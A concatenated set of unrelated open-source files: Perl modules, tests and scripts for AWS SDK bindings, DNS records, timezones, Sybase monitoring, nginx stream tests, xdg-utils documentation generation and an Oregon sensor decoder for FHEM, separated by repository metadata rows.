You can use special variables like: %{state}, %{status}, %{display}
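For example (illustrative expression only, using a state defined by this mode):
  --critical-status='%{state} =~ /brokenOff/'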
=item B<--warning-*> B<--critical-*>
Warning and critical thresholds.
Can be: 'lag' (s), 'transfer-traffic' (B/s), 'transfer-succeed',
'transfer-failed'.
=back
=cut
| 36.922131 | 180 | 0.551671 |
edb2f56e922d65f897503e42e90679fa3e053799 | 368 | pm | Perl | lib/Zonemaster/LDNS/RR/CAA.pm | pnax/zonemaster-ldns | 001a9835bbc92367f8bab4228010c62872f7ffba | [
"CC-BY-4.0"
] | null | null | null | lib/Zonemaster/LDNS/RR/CAA.pm | pnax/zonemaster-ldns | 001a9835bbc92367f8bab4228010c62872f7ffba | [
"CC-BY-4.0"
] | 1 | 2018-02-09T15:56:37.000Z | 2018-02-13T13:09:20.000Z | lib/Zonemaster/LDNS/RR/CAA.pm | mattias-p/zonemaster-ldns | b5d59e05d8926520c2fe8c571910491ca8f95dd2 | [
"CC-BY-4.0"
] | null | null | null | package Zonemaster::LDNS::RR::CAA;
use strict;
use warnings;
use parent 'Zonemaster::LDNS::RR';
1;
=head1 NAME
Zonemaster::LDNS::RR::CAA - Type CAA record
=head1 DESCRIPTION
A subclass of L<Zonemaster::LDNS::RR>, so it has all the methods of that class available in addition to the ones documented here.
=head1 METHODS
No RDATA methods implemented yet.
=cut
| 16 | 129 | 0.741848 |
73e51ce2a28b1554372d7d84592de80fc3a6282a | 2,059 | pm | Perl | auto-lib/Paws/ServerlessRepo/DeleteApplication.pm | 0leksii/aws-sdk-perl | b2132fe3c79a06fd15b6137e8a0eb628de722e0f | [
"Apache-2.0"
] | 164 | 2015-01-08T14:58:53.000Z | 2022-02-20T19:16:24.000Z | auto-lib/Paws/ServerlessRepo/DeleteApplication.pm | 0leksii/aws-sdk-perl | b2132fe3c79a06fd15b6137e8a0eb628de722e0f | [
"Apache-2.0"
] | 348 | 2015-01-07T22:08:38.000Z | 2022-01-27T14:34:44.000Z | auto-lib/Paws/ServerlessRepo/DeleteApplication.pm | 0leksii/aws-sdk-perl | b2132fe3c79a06fd15b6137e8a0eb628de722e0f | [
"Apache-2.0"
] | 87 | 2015-04-22T06:29:47.000Z | 2021-09-29T14:45:55.000Z |
package Paws::ServerlessRepo::DeleteApplication;
use Moose;
has ApplicationId => (is => 'ro', isa => 'Str', traits => ['ParamInURI'], uri_name => 'applicationId', required => 1);
use MooseX::ClassAttribute;
class_has _api_call => (isa => 'Str', is => 'ro', default => 'DeleteApplication');
class_has _api_uri => (isa => 'Str', is => 'ro', default => '/applications/{applicationId}');
class_has _api_method => (isa => 'Str', is => 'ro', default => 'DELETE');
class_has _returns => (isa => 'Str', is => 'ro', default => 'Paws::API::Response');
1;
### main pod documentation begin ###
=head1 NAME
Paws::ServerlessRepo::DeleteApplication - Arguments for method DeleteApplication on L<Paws::ServerlessRepo>
=head1 DESCRIPTION
This class represents the parameters used for calling the method DeleteApplication on the
L<AWSServerlessApplicationRepository|Paws::ServerlessRepo> service. Use the attributes of this class
as arguments to method DeleteApplication.
You shouldn't make instances of this class. Each attribute should be used as a named argument in the call to DeleteApplication.
=head1 SYNOPSIS
my $serverlessrepo = Paws->service('ServerlessRepo');
$serverlessrepo->DeleteApplication(
ApplicationId => 'My__string',
);
Values for attributes that are native types (Int, String, Float, etc) can be passed as-is (scalar values). Values for complex Types (objects) can be passed as a HashRef. The keys and values of the hashref will be used to instance the underlying object.
For the AWS API documentation, see L<https://docs.aws.amazon.com/goto/WebAPI/serverlessrepo/DeleteApplication>
=head1 ATTRIBUTES
=head2 B<REQUIRED> ApplicationId => Str
The Amazon Resource Name (ARN) of the application.
=head1 SEE ALSO
This class forms part of L<Paws>, documenting arguments for method DeleteApplication in L<Paws::ServerlessRepo>
=head1 BUGS and CONTRIBUTIONS
The source code is located here: L<https://github.com/pplu/aws-sdk-perl>
Please report bugs to: L<https://github.com/pplu/aws-sdk-perl/issues>
=cut
| 33.754098 | 249 | 0.734823 |
edb40965322d84bc3d4a82c59cfa389dbf16eb0a | 1,688 | t | Perl | stream_upstream_zone.t | cabecada/nginx-tests | 9ed3127deb5586ae0478598989cebfddb226b898 | [
"BSD-2-Clause"
] | null | null | null | stream_upstream_zone.t | cabecada/nginx-tests | 9ed3127deb5586ae0478598989cebfddb226b898 | [
"BSD-2-Clause"
] | null | null | null | stream_upstream_zone.t | cabecada/nginx-tests | 9ed3127deb5586ae0478598989cebfddb226b898 | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/perl
# (C) Sergey Kandaurov
# (C) Nginx, Inc.
# Stream tests for upstream zone.
###############################################################################
use warnings;
use strict;
use Test::More;
BEGIN { use FindBin; chdir($FindBin::Bin); }
use lib 'lib';
use Test::Nginx;
use Test::Nginx::Stream qw/ stream /;
###############################################################################
select STDERR; $| = 1;
select STDOUT; $| = 1;
my $t = Test::Nginx->new()->has(qw/stream stream_return stream_upstream_zone/)
->plan(2)->write_file_expand('nginx.conf', <<'EOF');
%%TEST_GLOBALS%%
daemon off;
events {
}
stream {
log_format test $upstream_addr;
upstream u {
zone u 1m;
server 127.0.0.1:8081;
}
upstream u2 {
zone u;
server 127.0.0.1:8081 down;
server 127.0.0.1:8081 backup down;
}
server {
listen 127.0.0.1:8081;
return OK;
}
server {
listen 127.0.0.1:8091;
proxy_pass u;
access_log %%TESTDIR%%/access1.log test;
}
server {
listen 127.0.0.1:8092;
proxy_pass u2;
access_log %%TESTDIR%%/access2.log test;
}
}
EOF
$t->write_file('index.html', '');
$t->run();
###############################################################################
my $p = port(8081);
stream('127.0.0.1:' . port(8091))->read();
stream("127.0.0.1:" . port(8092))->read();
$t->stop();
is($t->read_file('access1.log'), "127.0.0.1:$p\n", 'upstream name');
is($t->read_file('access2.log'), "u2\n", 'no live upstreams');
###############################################################################
| 19.181818 | 79 | 0.457938 |
ed4a5e305e684f8aab454996082673133126d0f6 | 1,972 | pm | Perl | perl/vendor/lib/DateTime/TimeZone/Africa/Nairobi.pm | Light2027/OnlineCampusSandbox | 8dcaaf62af1342470f9e7be6d42bd0f16eb910b8 | [
"Apache-2.0"
] | null | null | null | perl/vendor/lib/DateTime/TimeZone/Africa/Nairobi.pm | Light2027/OnlineCampusSandbox | 8dcaaf62af1342470f9e7be6d42bd0f16eb910b8 | [
"Apache-2.0"
] | 3 | 2021-01-27T10:09:28.000Z | 2021-05-11T21:20:12.000Z | perl/vendor/lib/DateTime/TimeZone/Africa/Nairobi.pm | Light2027/OnlineCampusSandbox | 8dcaaf62af1342470f9e7be6d42bd0f16eb910b8 | [
"Apache-2.0"
] | null | null | null | # This file is auto-generated by the Perl DateTime Suite time zone
# code generator (0.08) This code generator comes with the
# DateTime::TimeZone module distribution in the tools/ directory
#
# Generated from /tmp/PG8ljYXUN8/africa. Olson data version 2019c
#
# Do not edit this file directly.
#
package DateTime::TimeZone::Africa::Nairobi;
use strict;
use warnings;
use namespace::autoclean;
our $VERSION = '2.38';
use Class::Singleton 1.03;
use DateTime::TimeZone;
use DateTime::TimeZone::OlsonDB;
@DateTime::TimeZone::Africa::Nairobi::ISA = ( 'Class::Singleton', 'DateTime::TimeZone' );
my $spans =
[
[
DateTime::TimeZone::NEG_INFINITY, # utc_start
60825936764, # utc_end 1928-06-30 21:32:44 (Sat)
DateTime::TimeZone::NEG_INFINITY, # local_start
60825945600, # local_end 1928-07-01 00:00:00 (Sun)
8836,
0,
'LMT',
],
[
60825936764, # utc_start 1928-06-30 21:32:44 (Sat)
60873368400, # utc_end 1929-12-31 21:00:00 (Tue)
60825947564, # local_start 1928-07-01 00:32:44 (Sun)
60873379200, # local_end 1930-01-01 00:00:00 (Wed)
10800,
0,
'EAT',
],
[
60873368400, # utc_start 1929-12-31 21:00:00 (Tue)
61188903000, # utc_end 1939-12-31 21:30:00 (Sun)
60873377400, # local_start 1929-12-31 23:30:00 (Tue)
61188912000, # local_end 1940-01-01 00:00:00 (Mon)
9000,
0,
'+0230',
],
[
61188903000, # utc_start 1939-12-31 21:30:00 (Sun)
61820054100, # utc_end 1959-12-31 21:15:00 (Thu)
61188912900, # local_start 1940-01-01 00:15:00 (Mon)
61820064000, # local_end 1960-01-01 00:00:00 (Fri)
9900,
0,
'+0245',
],
[
61820054100, # utc_start 1959-12-31 21:15:00 (Thu)
DateTime::TimeZone::INFINITY, # utc_end
61820064900, # local_start 1960-01-01 00:15:00 (Fri)
DateTime::TimeZone::INFINITY, # local_end
10800,
0,
'EAT',
],
];
sub olson_version {'2019c'}
sub has_dst_changes {0}
sub _max_year {2029}
sub _new_instance {
return shift->_init( @_, spans => $spans );
}
1;
| 22.666667 | 89 | 0.673935 |
eda6e4ff76b9cc9a39667ef038edc31e3f1c2fdf | 3,241 | pm | Perl | database/sybase/mode/connectedusers.pm | alenorcy/centreon-plugins | d7603030c24766935ed07e6ebe1082e16d6fdb4a | [
"Apache-2.0"
] | null | null | null | database/sybase/mode/connectedusers.pm | alenorcy/centreon-plugins | d7603030c24766935ed07e6ebe1082e16d6fdb4a | [
"Apache-2.0"
] | 2 | 2016-07-28T10:18:20.000Z | 2017-04-11T14:16:48.000Z | database/sybase/mode/connectedusers.pm | alenorcy/centreon-plugins | d7603030c24766935ed07e6ebe1082e16d6fdb4a | [
"Apache-2.0"
] | 1 | 2018-03-20T11:05:05.000Z | 2018-03-20T11:05:05.000Z | #
# Copyright 2019 Centreon (http://www.centreon.com/)
#
# Centreon is a full-fledged industry-strength solution that meets
# the needs in IT infrastructure and application monitoring for
# service performance.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
package database::sybase::mode::connectedusers;
use base qw(centreon::plugins::mode);
use strict;
use warnings;
sub new {
my ($class, %options) = @_;
my $self = $class->SUPER::new(package => __PACKAGE__, %options);
bless $self, $class;
$options{options}->add_options(arguments =>
{
"warning:s" => { name => 'warning', },
"critical:s" => { name => 'critical', },
});
return $self;
}
sub check_options {
my ($self, %options) = @_;
$self->SUPER::init(%options);
if (($self->{perfdata}->threshold_validate(label => 'warning', value => $self->{option_results}->{warning})) == 0) {
$self->{output}->add_option_msg(short_msg => "Wrong warning threshold '" . $self->{option_results}->{warning} . "'.");
$self->{output}->option_exit();
}
if (($self->{perfdata}->threshold_validate(label => 'critical', value => $self->{option_results}->{critical})) == 0) {
$self->{output}->add_option_msg(short_msg => "Wrong critical threshold '" . $self->{option_results}->{critical} . "'.");
$self->{output}->option_exit();
}
}
sub run {
my ($self, %options) = @_;
# $options{sql} = sqlmode object
$self->{sql} = $options{sql};
$self->{sql}->connect();
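    # The "spid >= 51" filter in the query below is meant to skip the low spids
    # reserved for system processes, so only user connections are counted.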
$self->{sql}->query(query => q{SELECT count(*) FROM master..sysprocesses WHERE spid >= 51});
my $users = $self->{sql}->fetchrow_array();
my $exit_code = $self->{perfdata}->threshold_check(value => $users, threshold => [ { label => 'critical', exit_litteral => 'critical' }, { label => 'warning', exit_litteral => 'warning' } ]);
$self->{output}->output_add(severity => $exit_code,
short_msg => sprintf("%i Connected user(s).", $users));
$self->{output}->perfdata_add(label => 'connected_users',
value => $users,
warning => $self->{perfdata}->get_perfdata_for_output(label => 'warning'),
critical => $self->{perfdata}->get_perfdata_for_output(label => 'critical'),
min => 0);
$self->{output}->display();
$self->{output}->exit();
}
1;
__END__
=head1 MODE
Check Sybase connected users.
=over 8
=item B<--warning>
Warning threshold on the number of connected users.
=item B<--critical>
Critical threshold on the number of connected users.
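For example (illustrative values):
  --warning='50' --critical='100'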
=back
=cut
| 32.737374 | 195 | 0.587164 |
ed98af65fe41a146aca2be8e591bd1b509c13376 | 1,449 | pm | Perl | Git/usr/lib/perl5/core_perl/IO.pm | DalalBassam/myrecipeswebsite | 1ac6e97b6bac19b6d8a06d8ebf36e1f1b79a18f4 | [
"MIT"
] | 12 | 2016-05-06T23:44:19.000Z | 2018-04-27T21:46:36.000Z | Git/usr/lib/perl5/core_perl/IO.pm | DalalBassam/myrecipeswebsite | 1ac6e97b6bac19b6d8a06d8ebf36e1f1b79a18f4 | [
"MIT"
] | 5 | 2020-03-23T07:56:06.000Z | 2020-03-24T02:05:11.000Z | Git/usr/lib/perl5/core_perl/IO.pm | DalalBassam/myrecipeswebsite | 1ac6e97b6bac19b6d8a06d8ebf36e1f1b79a18f4 | [
"MIT"
] | 9 | 2016-10-21T08:18:57.000Z | 2021-05-23T14:19:21.000Z | #
package IO;
use XSLoader ();
use Carp;
use strict;
use warnings;
our $VERSION = "1.38";
XSLoader::load 'IO', $VERSION;
sub import {
shift;
warnings::warnif('deprecated', qq{Parameterless "use IO" deprecated})
if @_ == 0 ;
my @l = @_ ? @_ : qw(Handle Seekable File Pipe Socket Dir);
local @INC = @INC;
pop @INC if $INC[-1] eq '.';
eval join("", map { "require IO::" . (/(\w+)/)[0] . ";\n" } @l)
or croak $@;
}
1;
__END__
=head1 NAME
IO - load various IO modules
=head1 SYNOPSIS
use IO qw(Handle File); # loads IO modules, here IO::Handle, IO::File
use IO; # DEPRECATED
=head1 DESCRIPTION
C<IO> provides a simple mechanism to load several of the IO modules
in one go. The IO modules belonging to the core are:
IO::Handle
IO::Seekable
IO::File
IO::Pipe
IO::Socket
IO::Dir
IO::Select
IO::Poll
Some other IO modules don't belong to the perl core but can be loaded
as well if they have been installed from CPAN. You can discover which
ones exist by searching for "^IO::" on http://search.cpan.org.
For more information on any of these modules, please see its respective
documentation.
=head1 DEPRECATED
use IO; # loads all the modules listed below
The loaded modules are IO::Handle, IO::Seekable, IO::File, IO::Pipe,
IO::Socket, IO::Dir. You should instead explicitly import the IO
modules you want.
=cut
| 20.408451 | 73 | 0.636301 |
ed2707d6d0fb18521325ce819749fa83fec349b9 | 102 | t | Perl | test/blackbox-tests/test-cases/shadow-bindings.t/run.t | jeremiedimino/dune | ba112ce967bb9307db7d92efcb13c603724947e5 | [
"MIT"
] | 1 | 2022-03-21T15:43:42.000Z | 2022-03-21T15:43:42.000Z | test/blackbox-tests/test-cases/shadow-bindings.t/run.t | jeremiedimino/dune | ba112ce967bb9307db7d92efcb13c603724947e5 | [
"MIT"
] | 2 | 2018-01-12T08:41:59.000Z | 2020-12-30T21:57:31.000Z | test/blackbox-tests/test-cases/shadow-bindings.t/run.t | jeremiedimino/dune | ba112ce967bb9307db7d92efcb13c603724947e5 | [
"MIT"
] | 1 | 2017-12-07T21:21:12.000Z | 2017-12-07T21:21:12.000Z | Bindings introduced by user dependencies should shadow existing bindings
$ dune runtest
xb
foo
| 17 | 72 | 0.784314 |
eda09f4757b9980aac93b9c1be8f1dd2589b679c | 3,460 | pm | Perl | src/main/resources/project/lib/Amazon/EC2/Model/CreateVolumeResponse.pm | horodchukanton/EC-EC2 | 2e82f82e24cd19fb408dee7d92f5bb072328c3df | [
"Apache-2.0"
] | null | null | null | src/main/resources/project/lib/Amazon/EC2/Model/CreateVolumeResponse.pm | horodchukanton/EC-EC2 | 2e82f82e24cd19fb408dee7d92f5bb072328c3df | [
"Apache-2.0"
] | 12 | 2015-11-09T18:52:09.000Z | 2019-07-17T12:00:09.000Z | src/main/resources/project/lib/Amazon/EC2/Model/CreateVolumeResponse.pm | horodchukanton/EC-EC2 | 2e82f82e24cd19fb408dee7d92f5bb072328c3df | [
"Apache-2.0"
] | 4 | 2015-11-09T14:47:55.000Z | 2018-12-21T21:51:42.000Z | ###########################################$
# Copyright 2008-2010 Amazon.com, Inc. or its affiliates. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License"). You may not
# use this file except in compliance with the License.
# A copy of the License is located at
#
# http://aws.amazon.com/apache2.0
#
# or in the "license" file accompanying this file. This file is distributed on
# an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
# or implied. See the License for the specific language governing permissions
# and limitations under the License.
###########################################$
# __ _ _ ___
# ( )( \/\/ )/ __)
# /__\ \ / \__ \
# (_)(_) \/\/ (___/
#
# Amazon EC2 Perl Library
# API Version: 2010-06-15
# Generated: Wed Jul 21 13:37:54 PDT 2010
#
package Amazon::EC2::Model::CreateVolumeResponse;
use base qw (Amazon::EC2::Model);
#
# Amazon::EC2::Model::CreateVolumeResponse
#
# Properties:
#
#
# CreateVolumeResult: Amazon::EC2::Model::CreateVolumeResult
# ResponseMetadata: Amazon::EC2::Model::ResponseMetadata
#
#
#
sub new {
my ($class, $data) = @_;
my $self = {};
$self->{_fields} = {
CreateVolumeResult => {FieldValue => undef, FieldType => "Amazon::EC2::Model::CreateVolumeResult"},
ResponseMetadata => {FieldValue => undef, FieldType => "Amazon::EC2::Model::ResponseMetadata"},
};
bless ($self, $class);
if (defined $data) {
$self->_fromHashRef($data);
}
return $self;
}
#
# Construct Amazon::EC2::Model::CreateVolumeResponse from XML string
#
sub fromXML {
my ($self, $xml) = @_;
eval "use XML::Simple";
my $tree = XML::Simple::XMLin ($xml);
# TODO: check valid XML (is this a response XML?)
return new Amazon::EC2::Model::CreateVolumeResponse($tree);
}
sub getCreateVolumeResult {
return shift->{_fields}->{CreateVolumeResult}->{FieldValue};
}
sub setCreateVolumeResult {
my ($self, $value) = @_;
$self->{_fields}->{CreateVolumeResult}->{FieldValue} = $value;
}
sub withCreateVolumeResult {
my ($self, $value) = @_;
$self->setCreateVolumeResult($value);
return $self;
}
sub isSetCreateVolumeResult {
return defined (shift->{_fields}->{CreateVolumeResult}->{FieldValue});
}
sub getResponseMetadata {
return shift->{_fields}->{ResponseMetadata}->{FieldValue};
}
sub setResponseMetadata {
my ($self, $value) = @_;
$self->{_fields}->{ResponseMetadata}->{FieldValue} = $value;
}
sub withResponseMetadata {
my ($self, $value) = @_;
$self->setResponseMetadata($value);
return $self;
}
sub isSetResponseMetadata {
return defined (shift->{_fields}->{ResponseMetadata}->{FieldValue});
}
#
# XML Representation for this object
#
# Returns string XML for this object
#
sub toXML {
my $self = shift;
my $xml = "";
$xml .= "<CreateVolumeResponse xmlns=\"http://ec2.amazonaws.com/doc/2010-06-15/\">";
$xml .= $self->_toXMLFragment();
$xml .= "</CreateVolumeResponse>";
return $xml;
}
1;
| 25.072464 | 111 | 0.561561 |
ed29d94bf52d75a5f2b9e95d4cdb69f741ebf810 | 4,679 | pl | Perl | tests/doc_gen.pl | chromium-googlesource-mirror/xdg-utils | 7b903508c0dea743114236c35866a9131121ba61 | [
"MIT"
] | 2,151 | 2020-04-18T07:31:17.000Z | 2022-03-31T08:39:18.000Z | tests/doc_gen.pl | chromium-googlesource-mirror/xdg-utils | 7b903508c0dea743114236c35866a9131121ba61 | [
"MIT"
] | 395 | 2020-04-18T08:22:18.000Z | 2021-12-08T13:04:49.000Z | tests/doc_gen.pl | chromium-googlesource-mirror/xdg-utils | 7b903508c0dea743114236c35866a9131121ba61 | [
"MIT"
] | 338 | 2020-04-18T08:03:10.000Z | 2022-03-29T12:33:22.000Z | #!perl
use Data::Dumper;
my @test_files = split('\s+',`ls generic/t.* xdg-*/t.*`);
my $cvs_pre = "http://webcvs.freedesktop.org/portland/portland/xdg-utils/tests/";
my $cvs_post = '?view=markup';
my $assert_doc = "assertions.html";
my $now = scalar localtime;
my $style = "<style type=\"text/css\" media=\"all\">@import url(\"layout.css\");</style></head>\n";
my $root_header = qq{| <a href="index.html">Tests</a> | <a href="$assert_doc">Assertions</a> | <a href="http://portland.freedesktop.org/wiki/WritingXdgTests">Overview</a> |<hr/>\n};
my $group_header = qq{| <a href="../index.html">Tests</a> | <a href="../$assert_doc">Assertions</a> | <a href="http://portland.freedesktop.org/wiki/WritingXdgTests">Overview</a> |<hr/>\n};
my $footer = "<hr><font size=\"-1\">xdg-utils test documentation generated $now</font>\n";
my %fcns;
my %group;
my %shortdesc;
## Read assertion file
open IN, 'include/testassertions.sh' or die "Failed to open assertion file: $!\n";
my $state = 'NULL';
my %assertions;
while ( <IN> ) {
if ( m/(\w+)\s*\(\)/ ) {
$state = $1;
$assertions{$state} = ();
}
elsif ( $state ne 'NULL' and m/^#(.*)/ ) {
my $txt = $1;
chomp $txt;
push @{ $assertions{$state} }, $txt;
}
else {
$state = 'NULL';
}
}
close IN;
if ( ! -d 'doc' ) { mkdir 'doc'; }
open OUT, ">doc/$assert_doc" or die "Failed to open $assert_doc: $!\n";
print OUT "<html><head><title>xdg-utils test assertions</title>$style</head><body>\n$root_header";
my @s_assert = sort keys %assertions ;
print OUT qq{<h2>Defined Assertions in <a href="$cvs_pre}.qq{include/testassertions.sh$cvs_post">include/testassertions.sh</a></h2>\n};
for $a ( @s_assert ) {
print OUT qq{<a href="#$a">$a</a><br>\n};
}
for $a ( @s_assert ) {
print OUT qq{<hr><h2><a name="$a">$a</a></h2>\n};
print OUT "<pre>", join("\n",@{ $assertions{$a} } ), "</pre>\n";
}
print OUT "$footer</body></html>";
## Read test files
for $f ( @test_files ) {
open IN, $f or die "Failed to open $f: $!\n";
$f =~ m{(.+)/t\.(.+)};
my $dir = $1;
my $test = $2;
`mkdir -p doc/$dir`;
my $o = "doc/$dir/$test.html";
push @{ $group{$dir} }, $test;
open HTM, ">$o" or die "Failed to open '$o': $!\n";
print HTM "<html><head><title>xdg-utils test: $f</title>\n";
print HTM $style;
print HTM "<body>$group_header<h1>Test: <a href=\"$cvs_pre$f$cvs_post\">$f</a></h1><hr/>\n";
my $fcn = '';
my $state = 'BEGIN';
while ( <IN> ) {
#find the test function
if ( m/(\w+)\s*\(\)/ ) {
$fcn = $1;
if (defined $fcns{$fcn} ){
print "WARNING in $f: $fcn already exists in $fcns{$fcn}!\n"
}
$fcns{$fcn} = $f;
$state = 'FUNCTION';
}
#find test_start
elsif ( m/test_start (.*)/ ) {
print HTM "<h2>Purpose of $fcn</h2>";
my $txt = $1;
$txt =~ s/\$FUNCNAME:*\s*//;
$txt =~ s/\"//g;
$shortdesc{ $test } = $txt;
print HTM "<p>$txt</p>\n";
$state = 'START';
}
#find test_purpose
elsif ( m/test_purpose (.*)/ ) {
print HTM "<h2>Description</h2>";
my $txt = $1;
$txt =~ s/\"//g;
print HTM "<p>$txt</p>\n";
}
#find initilization
elsif ( m/test_init/ ) {
print HTM "<h2>Depencencies</h2>\n";
$state = 'INIT';
next;
}
elsif ( m/test_procedure/ ) {
print HTM "<h2>Test Procedure</h2>\n";
$state = 'TEST';
next;
}
elsif ( m/test_note (.*)/ ) {
print HTM "<h2>Note</h2><p>$1</p>\n";
next;
}
elsif ( m/test_result/ ) {
$state = 'DONE';
}
if ( m/^#/ ) {
next;
}
if ( $state eq 'INIT' or $state eq 'TEST' ) {
$line = $_;
$line =~ s/^\s*(\w+)/<a href="\.\.\/$assert_doc#$1">$1<\/a>/;
if ( $assertions{$1} ) {
print HTM "<p>$line</p>\n";
#print "$f:\t'$1' found\n";
}
else {
#print "$f:\t'$1' not found\n";
print HTM "<p>$_</p>\n";
}
#print HTM "<p>$_</p>\n";
}
}
print HTM "$footer</body></html>\n";
close HTM;
close IN;
}
open INDEX, ">doc/index.html" or die "Could not open index: $!";
print INDEX "<html><head><title>xdg-utils test suite</title>\n";
print INDEX $style;
print INDEX "<body>$root_header<h1>xdg-utils test documentation</h1>";
my @s_groups = sort keys %group;
for $g ( @s_groups ) {
print INDEX qq{<a href="#$g">$g</a> \n};
}
print INDEX "<table border=0>\n";
for $k ( @s_groups ) {
print INDEX qq{<tr><td colspan=2><hr><h2><a name="$k">$k</a></h2></td></tr>\n};
for $i ( @{ $group{$k} } ) {
print INDEX "<tr><td><a href=\"$k/$i.html\">$i</a></td><td>$shortdesc{$i}</td></tr>\n";
}
}
print INDEX "</table>$footer</body></html>\n";
close INDEX;
#print Dumper keys %assertions;
| 28.357576 | 189 | 0.543492 |
edae6e15aca13c56ce1c728a5ee96e55d5b9035b | 1,830 | t | Perl | modules/t/regression_featureAdaptorCache.t | sgiorgetti/ensembl | ff90d0812cc0e64cc55c74a759575db351c5217b | [
"Apache-2.0"
] | 1 | 2021-09-27T11:01:06.000Z | 2021-09-27T11:01:06.000Z | modules/t/regression_featureAdaptorCache.t | sgiorgetti/ensembl | ff90d0812cc0e64cc55c74a759575db351c5217b | [
"Apache-2.0"
] | 1 | 2021-09-23T13:46:54.000Z | 2021-09-23T13:46:54.000Z | modules/t/regression_featureAdaptorCache.t | sgiorgetti/ensembl | ff90d0812cc0e64cc55c74a759575db351c5217b | [
"Apache-2.0"
] | null | null | null | # Copyright [1999-2015] Wellcome Trust Sanger Institute and the EMBL-European Bioinformatics Institute
# Copyright [2016-2022] EMBL-European Bioinformatics Institute
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
use strict;
use warnings;
use Test::More;
use Test::Warnings;
use Bio::EnsEMBL::Test::MultiTestDB;
my $multi = Bio::EnsEMBL::Test::MultiTestDB->new();
my $db = $multi->get_DBAdaptor( "core" );
my $sa = $db->get_SliceAdaptor();
my $ga = $db->get_GeneAdaptor();
ok(!$ga->db()->no_cache(), 'Checking cache is on');
my $cache_assert = sub {
my ($expected) = @_;
is(scalar(keys %{$ga->{_slice_feature_cache}}), $expected, sprintf('Asserting cache has %d element(s)', $expected));
};
my $run = sub {
my $start = 30_249_935;
my $end = 31_254_640;
my $offset = 0;
my @regions = (
[$start, $end + $offset++],
[$start, $end + $offset++],
[$start, $end + $offset++],
[$start, $end + $offset++],
[$start, $end + $offset++]
);
$ga->fetch_all_by_Slice($sa->fetch_by_region( "chromosome", "20", @{$regions[0]} ));
$cache_assert->(1);
foreach my $region (@regions) {
my $slice = $sa->fetch_by_region( "chromosome", "20", @{$region} );
my $features = $ga->fetch_all_by_Slice($slice);
}
$cache_assert->(4);
};
$run->();
$ga->clear_cache();
$run->();
done_testing();
| 30 | 118 | 0.663934 |
ed14106870dc2abbde1d3efe4102770369ae5d23 | 10,222 | pm | Perl | fhem/core/FHEM/14_CUL_REDIRECT.pm | opit7/fhem-docker | d44c9913155318eeae9500767f947a02bbcbac76 | [
"MIT"
] | 9 | 2018-02-06T11:57:50.000Z | 2021-12-10T13:59:03.000Z | fhem/core/FHEM/14_CUL_REDIRECT.pm | opit7/fhem-docker | d44c9913155318eeae9500767f947a02bbcbac76 | [
"MIT"
] | null | null | null | fhem/core/FHEM/14_CUL_REDIRECT.pm | opit7/fhem-docker | d44c9913155318eeae9500767f947a02bbcbac76 | [
"MIT"
] | 1 | 2020-03-20T18:04:49.000Z | 2020-03-20T18:04:49.000Z | ##############################################
# From dancer0705
#
# Receive additional protocols received by cul
#
# Copyright (C) 2015 Bjoern Hempel
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation; either version 2 of the License, or (at your option) any later
# version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
# or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the
# Free Software Foundation, Inc.,
# 51 Franklin St, Fifth Floor, Boston, MA 02110, USA
#
##############################################
package main;
use Data::Dumper;
use strict;
use warnings;
use SetExtensions;
use constant { TRUE => 1, FALSE => 0 };
sub
CUL_REDIRECT_Initialize($)
{
my ($hash) = @_;
$hash->{Match} = "^o........";
$hash->{ParseFn} = "CUL_REDIRECT_Parse";
}
#
# Decode Oregon 2
#
sub decodeOrego2 {
my $msg = shift;
my $name = shift;
my @a = split("", $msg);
Log3 $name, 5, "CUL_REDIRECT decode Oregon 2 ($msg)";
my $newMSG = "";
my $bitData;
my $hlen = length($msg);
my $blen = $hlen * 4;
$bitData= unpack("B$blen", pack("H$hlen", $msg));
Log3 $name, 5, "bitdata: $bitData";
if (index($bitData,"10011001") != -1)
{ # Valid OSV2 detected!
Log3 $name, 5, "OSV2 protocol detected ($msg)";
my $preamble_pos=index($bitData,"10011001");
my $message_end=index($bitData,"10011001",$preamble_pos+44);
$message_end = length($bitData) if ($message_end == -1);
my $message_length = $message_end - $preamble_pos;
my $idx=0;
my $osv2bits="";
my $osv2hex ="";
for ($idx=$preamble_pos;$idx<length($bitData);$idx=$idx+16)
{
if (length($bitData)-$idx < 16 )
{
last;
}
my $osv2byte = "";
$osv2byte=NULL;
$osv2byte=substr($bitData,$idx,16);
my $rvosv2byte="";
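        # OSV2 sends each data bit twice: keep every second bit of this
        # 16-bit chunk and reverse the bit order to rebuild one byte.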
for (my $p=1;$p<length($osv2byte);$p=$p+2)
{
$rvosv2byte = substr($osv2byte,$p,1).$rvosv2byte;
}
$osv2hex=$osv2hex.sprintf('%02X', oct("0b$rvosv2byte")) ;
$osv2bits = $osv2bits.$rvosv2byte;
}
$osv2hex = sprintf("%02X", length($osv2hex)*4).$osv2hex;
if (length($osv2hex)*4 == 88) {
Log3 $name, 5, "CUL_REDIRECT: OSV2 protocol converted to hex: ($osv2hex) with length (".(length($osv2hex)*4).") bits \n";
return (1,$osv2hex);
} else {
Log3 $name, 5, "CUL_REDIRECT: ERROR: To short: OSV2 protocol converted to hex: ($osv2hex) with length (".(length($osv2hex)*4).") bits \n";
return (-1, "CUL_REDIRECT: ERROR: To short: OSV2 protocol converted to hex: ($osv2hex) with length (".(length($osv2hex)*4).") bits");
}
}
return (-1, "Not a origon 2 protocol");
}
